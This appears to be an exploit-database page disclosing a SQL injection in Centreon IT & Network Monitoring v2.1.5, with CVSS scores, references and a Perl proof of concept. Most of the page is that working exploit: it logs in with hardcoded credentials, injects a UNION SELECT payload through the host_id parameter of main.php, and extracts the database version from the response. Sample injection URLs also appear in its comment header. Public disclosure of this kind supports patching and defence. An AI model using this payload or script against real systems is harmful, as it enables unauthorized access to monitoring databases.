Centreon IT & Network Monitoring v2.1.5 - Injection SQL

2010.04.10
Credit: null
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # //--------[PoC]---------// # # Title : Centreon IT & Network Monitoring v2.1.5 - Injection SQL # Version : 2.1.5 # Author : Jonathan Salwan (j.salwan@sysdream.com) # # # [Vuln sql injection] # http://localhost/centreon/main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1 # # http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1 # # # //-------[Credit]-------// # # http://www.sysdream.com # http://www.shell-storm.org # use LWP::UserAgent; my $url = 'http://localhost/centreon/index.php'; my $login = 'root'; my $paswd = 'ptDB66'; my $sql = 'http://localhost/centreon/main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1'; my $ua = LWP::UserAgent->new; my $response = $ua->get($url); my $cook = $response->header('Set-Cookie'); my $req2 = $ua->post($url, {useralias => $login, password => $paswd, submit => 'login'}, Cookie => $cook, Content-Type => 'application/x-www-form-urlencoded' ); my $response = $ua->get($sql, Cookie => $cook); my $content = $response->content(); open(FILE, '>sql-centreon.txt'); print FILE $content; close(FILE); print "\n[Answer SQL Injection]\n\n"; my $selection = system('cat sql-centreon.txt | grep ">Host</td>"'); unlink('sql-centreon.txt'); print "\n";

References:

http://www.securityfocus.com/bid/39118
http://www.exploit-db.com/exploits/11979
http://secunia.com/advisories/39236
http://packetstormsecurity.org/1004-exploits/centreon-sql.txt
http://osvdb.org/63347


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top